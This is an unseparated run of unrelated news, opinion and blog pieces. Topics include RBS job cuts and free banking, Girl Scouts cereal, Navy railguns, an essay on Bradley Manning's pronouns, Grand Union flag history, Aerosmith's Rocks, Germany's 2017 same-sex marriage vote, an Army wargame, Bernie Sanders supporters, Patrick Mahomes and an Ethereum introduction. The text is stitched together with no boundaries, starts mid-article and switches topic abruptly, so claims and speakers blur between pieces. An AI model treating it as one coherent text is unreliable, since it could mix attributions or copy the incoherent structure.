Mr McEwan has now given more details about his restructuring plans, saying the bank would need to spend billions of pounds to fix its computer problems. “For the next five years we have to got to put £7bn into our technology operations,” he said.
Mr McEwan also said RBS's American investment banking operations would be reduced to the point where it would no longer be caught by new regulations that will force the largest foreign banks to put aside billions of pounds in extra capital in the country.
At present, RBS is one of 17 international financial groups with US operations larger than the $50bn (£30bn) threshold and will be required to set up a US-regulated holding company unless it reduces the size of its operations in the country dramatically.
“Remember, we are having to hold capital here [in the UK], so we have got to make sure we don't get capital trapped in businesses that are never going to produce returns for our shareholders,” he said.
Though declining to give details of the exact size of any future job cuts across the bank, Mr McEwan said the numbers would become clearer over “the next three to six months”.
He added: “I have to be quite honest, there will be job cuts in the organisation, it's just too big. It is a hangover from a different world that we lived in five to 10 years ago.”
“Free banking” has been the subject of several reviews in recent years as critics point out that it is a barrier to competition and prevents even financially sophisticated customers from working out what they are being charged.
Sir David Walker, the chairman of Barclays, said two years ago that he agreed “in principle” with ending the practice, while Andrew Bailey, the deputy governor of the Bank of England, has described free banking as a “myth”.
Lloyds Banking Group is known to be thinking of alternatives to providing free current accounts, with its chief executive, Antonio Horta-Osorio, thought to be sympathetic to abandoning the free-if-in-credit model.
Andrew Tyrie MP, chairman of the Treasury select committee, welcomed Mr McEwan's comments. “Millions of retail customers deserve more choice and competition from the banking services they use.
“Ross's remarks are a step in the right direction to securing more competition, which is a regulatory objective they [the regulators] can and should help take forwards – the sooner the better,” he said.
The select committee published a report in 2010 recommending the end of free bank accounts, stating that “greater disclosure of information on cost is a pre-condition to greater competition”.
If you've ever needed an excuse to eat cookies for breakfast, your wait is over: Girl Scouts is releasing Thin Mint and Caramel Crunch flavored cereal in January.
General Mills (gis), the company that is producing the cereal, confirmed the release of the flavors to Fortune via email. However, the Instagram account CandyHunting first broke the news when it shared two pictures of the Thin Mint and Caramel Crunch cereal boxes:
For now, the Thin Mint and Caramel Crunch flavored (modeled after Samoas) cereal appear to be the only options; the spokesperson did not say when or if any other flavors would be coming into the mix later on. But according to BuzzFeed, more information surrounding the release will be shared closer to the launch.
Both flavors will be available nationwide, the spokesperson told Fortune.
In addition to cereal, Girl Scouts announced in August that it's releasing two all-new S'mores flavored cookies. But cookie-lovers will have to wait for those flavors too: According to a previous report, they won't be available until selling season next year.
The year is 2019. The destroyer U.S.S. Mason patrols enemy waters, and is suddenly faced with a barrage of incoming missiles. Almost instantly, dozens of brightly colored lasers beam out of the Mason, intercepting the missiles and destroying them harmlessly in the air. Then a massive deck-mounted gun turns and takes aim at an onshore target 70 miles inland. The ship's lights dim for a moment, and the magnetic railgun fires a projectile at roughly Mach 7. The impact is audible as a dull, subsonic thud. Want to find out what else the Navy's researchers are cooking up?Once each year, the Office of Naval Research holds a conference where they explain what they're currently working on. This year, the ONR detailed several weapons systems that seem like they were lifted straight out of your favorite military sci-fi novel. Solid state fiber lasers could be mounted in "pods" on aircraft, able to deliver 100 kW blasts. Free Electron Lasers will begin development in 2010, and will hopefully have the ability to take out incoming ordinance or even small attack (or suicide) boats. The lasers don't stop there - helicopters could be equipped with laser terrain finding gear to help them land in "brownout" conditions. Lasers not sexy enough? How about directed microwave weapons? I've been dreaming of one of these for years, to take out the thumping audio systems of cars that drive past my house. The Navy would rather use them to fry the electronics in enemy equipment. The ultimate naval weapon might be the hyper-velocity railgun. It could propel projectiles up to 230 miles with killer accuracy at speeds close to Mach 7. The Navy holds a world record for "highest electromagnetic muzzle energy launch of a projectile" using such a weapon. I have no idea what that means, but I know I wouldn't want to get hit by one. These megaguns aren't without their flaws, though. That kind of muzzle velocity tends to destroy the barrel of the gun, and each firing draws something like three million amps. Image by: U.S. Navy. Navy Wants Lots of Lasers [Defense Tech]
Advertisement
Email Share +1 94 Shares
By Rainey Reitman
Some thoughtful feminist scholars have recently called on the Bradley Manning Support Network to begin referring to the accused WikiLeaks whistle-blower with a female pronoun. Emily Manuel's essay in Global Comment highlighted why many of us who strongly support transgender rights are sensitive to the pronouns we use when we refer to Manning.
As an ardent supporter of Bradley Manning and a feminist, I have given this issue a great deal of thought. Given the unusual and perhaps unprecedented circumstances of the situation, I wanted to explain why I'm still calling him Bradley. In so doing, I also hope to demonstrate why folks who care passionately about queer and transgender rights should come out in support.
First, we should bear in mind the basis upon which some have made suppositions about Manning's preferred gender identity. By and large, we are dealing with evidence that has not been established as fact. We can look at some Google searches found in forensic evidence, a smattering of late-night private chat logs, and potential testimony from those in whom Manning may have privately confided.
If these materials are to be believed, then it appears that Manning was questioning his gender identity. Manning's lawyers have noted that he had sought counseling, but we don't know if any final decision was ever made. We don't know whether Manning wanted “Breanna” to be a primary identity, or if this was an alter ego that was never meant to be indicative of primary gender identification. We do know — from our own private conversations with friends and family members — that prior to his incarceration, Manning had not asked people to refer to him with a female pronoun.
The decision to transition – especially when it entails life-changing hormones or even surgery – isn't something undergone lightly or quickly. Like many who are unsure about their gender identification, Manning used the Internet as a sandbox to begin experimenting with these complex issues. Unfortunately, he was arrested and forced to undergo many torturous months in solitary confinement, without proper medical, social, and emotional support during this time of questioning. We don't know whether he reached a final decision.
From the earliest stages, the Bradley Manning Support Network has sought to honor Manning's choices. Early in the campaign, we reached out to Manning's aunt and lawyer and asked what name he preferred we use in our advocacy. They got back to us to say that “Brad” or “Bradley” would be fine.
Since then, we've sent Bradley packages in the mail showing him the fliers, stickers, postcards, T-shirts and photos of rallies all emblazoned with the name “Bradley Manning.” Manning has issued three public statements since his incarceration: during his first Christmas behind bars he issued holiday wishes; after many long months in solitary confinement he released a multi-page letter describing his abusive conditions; and after the pretrial hearing in December, he communicated through his aunt that he appreciated our support.
Notably, he didn't ask us to start referring to him as Breanna. Advocates for Manning have an obligation to respect his agency and use the pronoun he had preferred prior to his arrest. None of us has the right to switch pronouns for Manning unless he tells us otherwise.
We also need to bear in mind that PFC Manning is currently – and quite literally – fighting for his life. He faces ridiculous charges of “aiding the enemy,” which carry a maximum sentence of death, despite the fact that our government's own impact assessments found no harm to national security from the WikiLeaks materials. This extreme retaliation against Manning for uncovering war crimes stands in stark contrast to the military's recent decisions to let other soldiers, who have admitted to killing unarmed civilians, walk free with nothing more than a cut in their pay.
This is not the normal legal environment that we may remember from our high school civics class. This is a show trial of a political prisoner. The military is openly abusing Manning of his rights in order to create a calculated psychological impact, and no doubt as a sharp warning to others who might consider exposing crimes and corruption.
Manning has been subjected to prolonged solitary confinement, which carries the risk of severe psychological damage. During that time, he was on several occasions ordered to remove his clothing and stand at “parade rest” in front of his guards. Those in the military know that this position requires you to place your hands behind your back. By all accounts, PFC Manning was the only detainee at the Quantico brig who was subjected to this peculiar form of humiliation. Military officials have since refused to turn over video-recordings that they made of these incidents.
It is difficult to conclude that this very specific form of degrading treatment has nothing to do with the fact that Manning was known to be questioning his gender identity.
When pressed on the mistreatment at a White House press conference, President Obama suggested that these absurd measures were imposed on Manning for his own safety. This excuse contradicted the findings of brig psychiatrists tasked with evaluating Manning, who found on every occasion that he posed no threat to himself in custody.
In this environment, those of us who have the luxury of relative freedom need to recognize that Manning might not be able to say everything that he really wants to say. In fact, we know this to be true. There have been several occasions in which meetings between Manning and his attorneys have been recorded by the military. Military officials have blocked Juan Mendez, the United Nations Special Rapporteur on Torture, from having a private meeting with PFC Manning. Manning has rejected an offer from the military to allow him to meet with Mendez on the condition that the meeting be monitored.
In short, Bradley Manning is being silenced. Whether through these direct restrictions on his ability to communicate freely, or more subtly through media narratives that attempt to erase his political agency, the establishment does not want us to hear Manning's true voice.
Each one of us working with the Bradley Manning Support Network anxiously awaits the day when Bradley Manning can speak freely, unencumbered by the shackles of oppression and injustice. But until that time, we can't presume to speak for him, especially on an issue as personal and yet political as gender identification.
Lt. Daniel Choi, who was discharged from the Army for being openly gay, recently called on the queer community to stand up for Bradley Manning. In an interview with Keith Olbermann, he decried the media's portrayal that Manning's sexual or gender identity was being used an excuse. He instead noted that Manning had displayed the highest level of integrity in his actions:
“I think at this point we can't say that he did any of this or didn't do any of this because he's gay or transgender. He did this because he's a good soldier… I'm proud of him as a gay soldier because he stood for integrity. And Keith, one thing about the gay community is that our community, among all of the communities in the world, we're the only one that bases its membership -— its membership — on integrity and telling the truth about ourselves, declassifying that information for the betterment of our entire lives and societies and families. And when we do that, we realize that the gay movement is more important than just for gay people alone.”
All available evidence points to Manning being driven by integrity. At the Article 32 hearing, military prosecutors submitted a note allegedly attached by Manning to the materials they say he sent to WikiLeaks concerning the wars in Iraq and Afghanistan. It read:
“This is perhaps one of the most significant documents of our time, removing the fog of war and revealing the true nature of 21st century asymmetric warfare.”
This seems to be the core motivation for Manning: to enlighten and educate the world, to create a better-informed democracy, to shed sunlight on the darkness covering our foreign policies and ongoing wars overseas. And, as queer activists have long known, there is power and transcendence in choosing truth, even when that truth makes others uncomfortable.
Rainey Reitman is a writer and a feminist. She sits on the Steering Committee of the Bradley Manning Support Network.
I won't be sending an email on Monday, in celebration of the 4th of July (yes, on the 5th). But there's a second bonus fact, below. Enjoy your weekends! -- Dan
The First American Flag Was Very British Looking
We are all familiar with the 50 stars and 13 stripes which, together, comprise the flag of the United States of America. The United States adopted that flag, originally with 13 stars, on June 14, 1777. But what did the fledgling nation -- and its band revolutionaries -- use beforehand?
The first American flag was actually the Grand Union, pictured right. Thirteen stripes, yes, but instead of stars, a smaller version of the British flag, the Union Flag. (If it looks different than the British flag you're familiar with, check out today's bonus fact!) The historic underpinnings of this flag remain fuzzy and may sadly be lost to antiquity. We do know two things: One, no one disputes that this British-looking flag was America's first, used at various times during the American Revolution. Second, the flag was first adorned by the Continental Navy warship, the U.S.S. Alfred, in December of 1775, as its official emblem, signifying its allegiance to the American colonies.
Other "facts" about the history of the Grand Union are still debated. Most historians believe that on New Year's Day, 1776, George Washington flew the Grand Union at Prospect Hill, in Somerville, Massachusetts, while forming the Continental Army. A likely apocryphal story states that the Second Continental Congress -- the body which adopted the Declaration of Independence -- adopted the Grand Union as the official emblem of the war efforts; however, the well-maintained records of the Continental Congress are silent to anything flag related before 1777. Finally, some believe the Grand Union was used to demonstrate to Britain that it remained loyal to the King, in spite of their differences, but that theory is conjecture without specific evidence.
Regardless, if you see this flag flying, rest assured it is a real American flag. Bonus fact : The Union Flag as we know it today is actually three emblems in one, representing the patron saint of the member countries: The Cross of Saint Andrew (Scotland), the Cross of Saint Patrick (Ireland), and St. George's Cross (England). Originally -- and in 1775, when the Grand Union emerged -- the flag only contained references to England and Scotland, signifying the union between those two kingdoms in 1603. It was not until 1800, when Ireland and the UK merged, that the Cross of Saint Patrick entered the design. Even though most of Ireland is now independent of the UK, the Cross remains in the Union Flag.
Double bonus! The Welsh Cross of Saint David is notoriously absent in the Union Flag. Why? Because when Scotland and the UK unified in 1603, Wales was already part of the United Kingdom. Therefore, the Union Flag, created by royal decree in 1606, officially is considered to incorporate Wales' presence via St. George's Cross -- albeit controversially, even to this day.
Share this email: or forward to a friend.
Aerosmith have pumped out a bunch of amazing records over their long and stellar recording career.
But when you throw on Rocks, there's just something about it that makes it stand out from the rest. Certainly part of what makes Rocks such a great album is Aerosmith wore everything on their sleeve and crafted it into some amazing music.
Coming off their highly successful breakthrough Toys in the Attic album, the Boston rockers were flying high in 1976 - figuratively and literally - and had found their groove with American audiences.
They had been touring their asses off and were reaping all the benefits of the rock' n roll lifestyle. So when it came time to record Rocks, the band was a well-oiled machine because the heroin and cocaine hadn't taken them down, as was the case when they began work on Draw the Line in 1977. It took just two months to record Rocks.
"There's no doubt we were doing a lot of drugs by then, but whatever we were doing, it was still working for us," recalled Joe Perry.
They set up in the Wherehouse in Waltham, Mass. with the Record Plant's mobile recording truck. Again, they enlisted Jack Douglas to help with production (he did Toy as well). Douglas notes that this was a time when bassist Tom Hamilton and guitarist Brad Whitford took more of an active role in writing songs.
Rocks was the album where Tom [Hamilton] and Brad had a lot more input," said Douglas, the unofficial sixth member of Aerosmith. "This was a big album for Aerosmith. It had to make a big statement about how loud and hard they were, how unapologetic they felt about being who they were - this brash, rude, sexual, hard-core rock band."
Rock Rolls with Stellar Songs
Whitford helped write "Last Child", while Hamilton was key in creating "Sick as a Dog", a song rumoured to be about meeting Mick Jagger, although it makes more sense that it is about meeting Keith Richards, given his heroin addiction at the time.
Rocks also features the amazing Joe Perry-penned "Combination", which sees him writing a phenomenal riff and sharing lead vocals with Steven Tyler. Perry said he wrote the song about "cocaine, heroin and me" to make the combination. Tyler loved the song and the lyrics, saying in his memoir "Does the Noise in My Head Bother You?" that the line "Walkin' on Gucci wearing Yves St. Laurent/Barely stay on 'cause I'm so goddamn gaunt" was the best lyric Perry ever wrote: "It was the truth, it was clever, and it described us to a tee".
There's also "Back in the Saddle", which comes from a riff Perry wrote while stoned on heroin. Tyler's sexual innuendo lyrics are perfect with the western feel of the song - all the while "riding high".
Another great song is the highly underrated apocalyptic "Nobody's Fault" which Tyler lists as being among his greatest efforts as a member of Aerosmith.
While Rolling Stone magazine said in its 1976 review the album was filled with "mediocre material", the album was a major influence on the likes of Slash, James Hetfield, Kurt Cobain, and Nikki Sixx, to name a few.
Check out our in-depth look at Black Sabbath's Sabotage album.
(CNN) German lawmakers voted by a wide margin to legalize same-sex marriage Friday, a landmark decision which came just days after Chancellor Angela Merkel dropped her longstanding opposition to a free vote on the issue.
The bill gives homosexual couples in Germany the same rights as heterosexual couples, and will allow same-sex couples to marry and jointly adopt children. It passed by 393 votes to 226, with four abstentions.
The bill is likely to pass through the Bundesrat -- Germany's upper house -- next week. The Bundesrat has previously approved legalizing same-sex marriage.
Supporters of gay rights celebrate following the vote Friday at the nearby Bundestag.
Once it has been officially signed into law, Germany will enter the club of more than 20 countries where same-sex marriage is legal.
Two-thirds of Germans said they were in favor of legalizing same-sex marriage in a recent YouGov poll
A crowd of same-sex marriage supporters who waited outside the parliament building as the vote was held cheered in celebration as the bill was passed, hailing a historic day for equal rights.
Merkel votes no
Speaking after the vote, Merkel said she had voted no on the issue, but that it had been important to put it to a vote of conscience.
Supporters of gay rights gathered outside the Chancellery to celebrate Friday.
"For me and the basic law, it's about the marriage of a woman and a man. That's why I voted against it," she said, adding that it had been an emotional debate for many in parliament, including herself.
"I hope that the vote today shows not only the mutual respect for different opinions but that this also leads to more peace and social cohesion as well," she said.
Chancellor Angela Merkel and other lawmakers line up to vote on same-sex marriage.
Martin Schulz, leader of the Social Democratic Party (SPD) -- the second largest party in parliament -- tweeted following the vote that "progress is possible" and said he was "happy for all the married couples to-be."
Progress is possible. As the 23rd country on earth, we now have marriage equality in Germany. I'm happy for all the married couples to-be. — Martin Schulz (@MartinSchulz) June 30, 2017
Speaking by Berlin's Brandenburg Gate, however, he cautioned that the law could still end up before the Federal Constitutional Court because some members of Merkel's conservative Christian Democratic Union (CDU) party view it as fundamentally unlawful and requiring a change to the constitution.
The vote was welcomed by the International Lesbian, Gay, Bisexual, Trans and Intersex Association in Europe, which suggested same-sex couples could be able to marry by the end of the year.
"After years of waiting and hoping, rainbow families in Germany will now receive equal recognition under the law -- this is a historic milestone that can inspire even more change for LGBTI people," said ILGA-Europe executive director Evelyne Paradis.
The German Foreign Office tweeted "congratulations to all gay couples who have been waiting to get married!"
The German Parliament approved same-sex marriage. Congratulations to all gay couples who have been waiting to get married! #Lovewins 🏳️‍🌈👬👫👭 pic.twitter.com/naRnJYFfxC — GermanForeignOffice (@GermanyDiplo) June 30, 2017
A 'vote of conscience'
The vote caps a turbulent week in German politics. Facing pressure on the issue from the leaders of other political parties, Merkel announced Monday that she would like to see parliament move towards a "vote of conscience" on same-sex marriage, kicking off a chain of events that culminated in Friday's vote.
The Chancellor made the comment at an event in Berlin hosted by women's magazine Brigitte, where she was asked by a gay man in the audience whether he would be able to refer to his partner as "my husband."
Merkel signaled a softening of her stance at an event Monday.
Merkel responded by acknowledging the widespread support for gay marriage among German voters and suggesting a free vote in parliament, meaning lawmakers vote freely rather than being asked to support their parties' official positions.
Her comments represented a significant shift for the German leader and for her conservative CDU party, which has long opposed same-sex marriage and promoted "traditional" family values. Some in its more conservative Bavarian sister party, the Christian Social Union (CSU) reacted angrily to news of the vote.
Merkel under pressure
But with September's election looming, Merkel has come under increasing pressure, with her main rivals and potential coalition partners announcing support for "Ehe für alle" (marriage for all).
The left-leaning Green party and the centrist FDP had both said that they would not enter into any coalition deal with Merkel if "Ehe für alle" was not enshrined in it. The left-leaning Die Linke party has long supported full equality.
Friday was the last chance for parliament to vote on the issue before it breaks for the summer recess and election campaigning begins in earnest.
The result was welcomed by many of the country's liberal politicians on Twitter.
"Today, our country is more free, more tolerant, and more modern," said FDP leader Christian Lindner.
Unser Land ist heute freier, toleranter und moderner geworden. CL #ehefueralle #LoveisLove — Christian Lindner (@c_lindner) June 30, 2017
Green Party leader Cem Özdemir said the bill "doesn't take away anything, gives everything," while Katja Kipping, chairwoman of Die Linke party, hailed its passage as a moment "when many have the courage to finally decide on a matter of course." She added, "Now it is time for more courage."
Not all supported the step though.
Frauke Petry, former chairwoman of the right-wing AFD party, tweeted that Merkel "puts up marriage for auction on the altar of remaining in power. What did this country get into!"
Election tactic?
Anja Neundorf, associate professor at the University of Nottingham, said she saw Merkel's change of stance as an election tactic designed to appeal to the average German voter -- but one that could backfire among traditional, religious CSU supporters in Bavaria. Merkel needs the support of those voters to win the election.
Gay rights supporters celebrate on Friday.
CSU supporters "are much more sensitive to this issue" than other voters, Neundorf told CNN. And some might choose to simply stay at home on polling day, she said.
By legalizing gay marriage, Germany follows the path of many of its European neighbors, as well as countries around the world.
In 2001, the Netherlands became the first country to legalize same-sex marriage. More than 20 other nations have followed suit, including Spain, Canada, Argentina, France, the United Kingdom and the United States.
ARMY WAR COLLEGE: A massive wargame held here this week to explore the “Deep Future” of warfare in the 2030s demonstrated a stark truth — one that Clausewitz enumerated in his famous work, On War — there's no substitute for sheer numbers, no matter how much high technology the Army buys.
That's an unsettling answer at a time when the deep, decade-long spending cuts called sequestration threaten to slash both the Army's numbers and the research and development money that ultimately gives birth to the most useful technology.
It takes a decade or two to take new technology from the laboratory to the battlefield or to grow a young second lieutenant into a commander. So Army leaders are painfully aware that if they want to get ready for the 2030s, they need to make some key investments now. To do that they need to sell them to skeptical civilians at the very moment when the rush to cut the budget makes it all too tempting to slash programs that only pay off in the longer term.
It's especially difficult for the Army, which has poured more money into cancelled acquisition programs than any other service over the past two decades. With Iraq over and Afghanistan winding down, the Marines are returning to their seaborne roots; the Air Force and Navy have a high-tech concept known as AirSea Battle. The Army is having an identity crisis.
Precisely because the Army is the largest service, precisely because it is the most diverse, it spends the most time and effort getting all its internal factions to agree. By the time that anything like a vision has made the stations of the cross to get approval and input from all the requisite generals, it's usually watered down and bloated up into cluttered, incoherent PowerPoint slides (“my instructions were to put all the ideas up there,” one briefer said) that are unintelligible to outsiders – including the people who sign the Army's checks.
When I said this, in blunter terms, to a room full of generals, colonels, and senior Army civilians here, I was surprised by the response: a lot of rueful laughter, nodding heads, and — most surprising — a fist-bump from a two-star general.
It's true, another two-star said. “Because we are the most complex and dysfunctional of the organizations in the Department of Defense, we have meandered all over the place,” the major-general sighed. One civilian official, he said, had even warned him that “one thing you've got to do is decide what you're going to do: You can't change your minds every year-and-a-half.”
This week's wargames and the associated conference of senior officers – involving more than a hundred people from the Army, other services, civilian agencies, foreign allies, and even an advisory body to the UN – are part of an Army program called “Unified Quest,” an ongoing effort to figure out the future of the service. The Army organizer, the Training And Doctrine Command (TRADOC), has given the other armed services, civilian agencies, and even me, a journalist, extraordinarily open access to some brutally honest discussions.
“I feel like I'm leading a root canal,” said one general moderating Thursday's discussion.
“The Army is almost unique in its ability to have a self-critical discussion like this and be a true learning organization,” the Stimson Center's Lincoln Bloomfield told me after we both participated in a previous conference at Fort Belvoir. “If you had a similar gathering at a civilian agency the culture would tend to produce talk of inputs rather than outputs, efforts made rather than results achieved. As the September 19 House hearing on Benghazi made clear, the State Department has no institutionalized process for lessons learned.” The Army has an entire organization devoted to dissecting what went wrong or right.
Facing An Ugly Future
The most striking case of the Army's capacity for self-criticism that I saw came on Thursday afternoon, when a colonel and his staff briefed senior officers on how the wargames were going downstairs. (The fictional scenario was deemed too sensitive for me to sit in on the turn-by-turn planning, unlike the previous game, but I was allowed to attend the conference on the condition that I not identify any participant by name).
As in the past, TRADOC was actually running two wargames side-by-side, each fighting the same enemies in the same scenario but with significantly different assets on the American side. The “evolution force” assumed the Army sticks with its current 30-year modernization plan (although funding for it is in real danger): The only new systems in its arsenal would be ones whose key components have at least proven they can function in the lab. (The government calls this “Technological Readiness Level four” (TRL 4). The “innovation force,” however, assumed the Army had the funding – and enough luck – to get more radical technology ready in time, ranging from robotics to rapid deployment to “potential game changer technology in directed energy” (such as lasers to shoot down enemy missiles, microwave blasts to fry enemy electronics, and artillery railguns).
The high-tech option certainly got there faster: It deployed an “operationally significant” force to the crisis zone within 16 days, compared to 45 days for the less advanced alternative. True, the Army can already drop a battalion of paratroopers from the 82 Airborne Division's “Global Response Force” anywhere on the planet overnight and deploy a full airborne brigade in 96 hours, but those are relatively lightly armed foot troops. It takes weeks or months to move in heavy artillery and armored vehicles. When airborne troops deployed to Saudi Arabia to deter Saddam Hussein's armored legions from invading In the 1990's Operation Desert Shield they were described by an authoritative Pentagon study as “the speed bump.” Even if every single missile the 82nd carried destroyed an Iraqi tank, one veteran of the operation told the conference, “we were still short.” So closing that gap between the rapid-deploying light brigades and the slower-moving heavy hitters is crucial to the Army's crisis response. Simply put, said one participant, “there's less time for bad things to happen.”
Where things went sour was when the simulated US force actually closed for battle, even in the high-tech version. “When the innovative force met the enemy and got in, it just didn't seem that technology gave you the advantage that you wanted,” said the colonel leading the briefing. Though he didn't characterize what happened as a “defeat,” he acknowledged that progress stalled, calling it an “operational pause.”
Why? “I don't know,” the colonel said, pointing out that the final turn of the game was still in progress and analysis had barely begun. “I just know it's worth doing an [analysis] to break apart why the units had to stop. Were they overwhelmed?”
Diagnosing The Dangers
Institutions, like scientists, learn more from failure than from success, and the point of playing wargames is to push your force to the limit and see where it breaks so you can fix problems before they occur in real life. The Army is just beginning in-depth analysis of this week's wargame, but first impressions suggest three major fault lines:
Part of the problem may be with the Army's evolving concept for future warfare, “Integrated Distributed Operations.” IDO calls for fast-moving units to strike at multiple points, each moving independently rather forming a single battle front (hence “distributed”) but coordinating maneuvers and concentrating their fire (hence “integrated”) through secure communications networks. In part, the idea is to make up for smaller forces with superior speed and flexibility. But in the wargames, the enemy fought on doggedly against the more agile Americans and kept US units from joining forces.
“You didn't get the shock [effect] you were looking for,” said the colonel, “and they couldn't make [US-controlled areas] contiguous, even when they were reinforced over and over again.”
Part of the problem may be technology: Adversaries around the world are catching up. By the 2030s some countries – or well-connected non-state forces such as Hezbollah – may challenge or even exceed American capabilities in a few key areas. “When you get to near tech parity,” said the colonel, “the engagements are intensive, they're longer than what we were expecting to see, and… the way we've chosen to go in doesn't allow the commander to have options.”
In a study of more than a dozen militarily relevant technologies, from armor protection to bioscience to robotics, the Army analysts predicted the US would stay on top throughout the 2030s in just two: the “Internet of things” and “synthetic biology.” Barring additional investment, the study said, armor, robotics, and electromagnetic rail guns would remain solid areas of American advantage until about 2030, while computing, night vision, and drones (unmanned air vehicles) would stay in the US column only until sometime in the 2020s. Cyberwarfare, chemical weapons, and artillery of all kinds – from ballistic missiles to rockets to conventional howitzers – were all areas where some adversaries might well have the edge on the United States already.
Overall, said one general, “we believe [that] our advantage is sustainable through the next two decades or so, but as you get into the 2030-2040 period [and] if we stay on this path, we very likely will put our soldiers in the future at risk. They will lose the competitive advantage that we've come to know and love.”
Even in the alternative future where the Army was able to make additional investments in breakthrough technologies, however, the high-tech force still ran into trouble. A crucial problem was that we were sometimes just so badly outnumbered that no amount of technology could make up for it.
“We're finding the mass, in certain situations, isn't there,” said the colonel running the briefing.
The general was blunter: “We started running out of numbers,” he said. “At some point those numbers still matter.”
Three recent wargames and a RAND study all agreed the Army would need to field 20 combat brigades against a threat on the scale of North Korea, the general continued. But the Army is currently shrinking to 32 brigade combat teams, which would leave very little margin for error or other simultaneous contingencies.
The mandatory 10-year budget cuts known as sequestration will make all this much worse.
So far, although the Army is in the process of shedding 80,000 soldiers – from 570,000 at the height of the Iraq war to a planned 490,000 in 2017 – it is mostly giving back its post-9/11 buildup and streamlining support functions such as headquarters and supply. In the current reorganization, “we just eliminated overhead,” the general said. But that plan predates sequestration.
As sequestration bite deeper, “we're going to start seeing further reductions,” the general said. “It's not just going to be brigade headquarters or a sustainment battalion, [but] the core fighting capability of the Army.”
I have a message for those who are frustrated by some of the loudest Bernie Sanders supporters, who are turned off by the so-called “Bernbots” and “Berniebros.”
I hear you.
I really do, because every time a union or progressive organization announces their endorsement of Hillary Clinton, I visit their Facebook page and read some of the most vile, impotent rage this side of a YouTube comment section. It's only a small part of the comments, but it's the loudest. It's gross, and it's counterproductive.
Please understand that the vast majority of people under 45 — Gen X and Millennials both — have reacted in many ways over the years to American politics, from apathy to mockery to outrage. We've had Jon Stewart, Rage Against the Machine, and Occupy Wall Street, but there's one thing we haven't had: A candidate.
And now we do, and some of us are understandably losing our collective shit over it and we become insufferable when we see people willing to squander this opportunity to elect a real progressive with consistent solidarity with the regular people. The urgency has gotten the better of our collective judgment… not just a few times, but regularly. It's an epidemic, which is sad, because part of the reason we appreciate Bernie Sanders so much is because he keeps it classy.
Now, it's important to note that I'm not sorry for being angry. We should all be angry at this corrupt system, driven by lobbyists and industry leaders. I'm not sorry for being passionate. We should all be fired up over the opportunity to shift our culture and our politics in a direction that works for all of the people. These are natural reactions, and we can express our anger and passion without the vitriol. I'm sorry for the few who've taken it too far… but I'm not sorry for being so eager to elect Bernie and constantly shouting it from the rooftops. (NOTE: This paragraph was added after some constructive feedback.)
So I want to apologize and urge you to look at the candidate before you look at the loudest supporters, whose passion boils over in unproductive ways. And when you think “this guy doesn't understand economics,” consult the actual award-winning economists who stand with him. And when you think “this guy puts too much emphasis on climate change,” consult the Pentagon who released a report about the national security implications of climate change.
Because Bernie's campaign isn't trying to appeal to what you think you know. Bernie is the honey badger candidate. He doesn't give a shit what you think you know. He's running on solid policy, and only policy. He's not into pandering or focus groups, and he doesn't engage in shouting matches, even if some of his backers seem to forget that in their own Facebook diatribes. With a little bit of research, you'll soon find that his platform stands on its own and there's no reason for us to resort to harsh words or personal attacks. Many of us need to do better, and today I pledge to add that to my many campaign-related goals in the coming months.
This presidential election, paired up with state and local offices that can create a mandate for a progressive leader, is every bit as important as FDR's election eighty years ago. I preach a lot on Facebook, but my long-term friends know I've never gone all in like this for a single candidate. There's a reason for that: I've never had the opportunity to vote for a man the caliber of Bernie Sanders, and I hope you're willing to ask questions and learn why, and willing to forgive some of his angrier supporters as they learn to handle the frustrations of a cash-fueled political process.
What I know for sure is that we can win, but we can just as easily lose if we don't stay relentless. Even more scary is how easily we can lose if we don't channel the patience and maturity of the candidate himself. As the movement becomes aware of the damage it self-inflicts, I hope you'll stick around while we reflect and refocus.
And I hope, once you see that side of the campaign, that you'll consider casting a vote for progress.
SIDE NOTE: For any Bernie supporters stumbling across this article, I'm working on a project with Lorain County for Bernie Sanders to send mailers to hundreds — if not thousands — of residents in the crucial swing state of Ohio. Most of our funding will come out of our own pockets, but some of it will also come from this “Give 'em Hell, Bernie” bumper sticker which you can order for $6 with free shipping in the US. 100% of the money earned will be used for the mailers. Please consider supporting our efforts!
The Patrick Mahomes hype train hit top speed last week after the rookie's final preseason appearance. The first-round quarter back flashed his unvarnished talent, including uncorking a ridiculous 46-yard bomb on the run while getting drilled by a defender.
The Kansas City Chiefs' brass, however, continues to pump the breaks on the Mahomes hype. General manager Brett Veach noted Saturday that the rookie remains a work in progress and well behind Alex Smith in ability to run an offense.
"Coach made a statement a few days back, there's no gray area. Alex (Smith) is our quarterback," Veach said, via the team's official website. "Alex is so far advanced from the mental side of things in regards to his ability to read coverages, to shift to better plays and really play the chess game. He's so far ahead of what Pat (Mahomes) is.
"I don't think it's even close right now. But going back to Pat, the development he has made and the strides he has taken in those departments has exceeded our expectations to this point. So we're excited where we are and again the longer that Alex and Pat are together, the better we will be."
Smith opens the season as the starting quarterback after leading the Chiefs to the playoffs three of the past four seasons. The veteran signal-caller should remain under center as long as he's healthy and K.C. remains in the playoff hunt.
Smith owns the smarts and veteran savvy, but Mahomes' talent is undeniable. The rookie's arm and athleticism could eventually open a restricted Chiefs offense. While Kansas City hopes it doesn't have to play the rookie at all this season, at some point Mahomes will take over. Veach noted that the first-round pick is already making strides picking up Andy Reid's offense.
"Coach Reid demands a ton at that position, so I would say he's ahead of where we thought he would be given the fact that he didn't have a lot of calls, checks and IDs from the college game," Veach said. "We knew he was smart and we knew he would pick it up. But I would say he's ahead of where he is, but there's still obviously a lot for him to learn. But just like you guys, we're all excited. When the time comes, he'll be ready to rock and roll."
Whenever Mahomes is ready to rock and roll, perhaps the restrictor plate will finally come off the Chiefs' offense.
Before you begin I need to inform you, dear reader, that I am a serious nerd and what follows are a double dose of nerdage that you may never recover from. Consider yourself warned.
As a kid I played Dungeons & Dragons and Magic: The Gathering. I read plenty of fantasy books and watched my fair share of anime. Dragons, medieval weapons, and sorcery occupied far too much of my time and I, like many other nerds out there, desperately wanted something like magic to be real. I would daydream about being able to channel some form of magical energy to cast spells, summon creatures, and control objects around me. Sadly, in the real world, nothing like that existed.
Until now.
Ethereum is pretty magical, and it's not just that their logo resembles a Magic: The Gathering expansion set symbol:
Ethereum is a cryptocurrency that, like other cryptocurrencies, allows you to transfer tokens to and from accounts on a decentralized ledger. In Bitcoin those tokens are (obviously named) bitcoins, and in Ethereum those tokens are ether. But Ethereum lets you do something else. Ethereum allows you to create and deploy “smart contracts”. Once deployed these smart contracts exist in the Ethereum space where people and machines can interact with them.
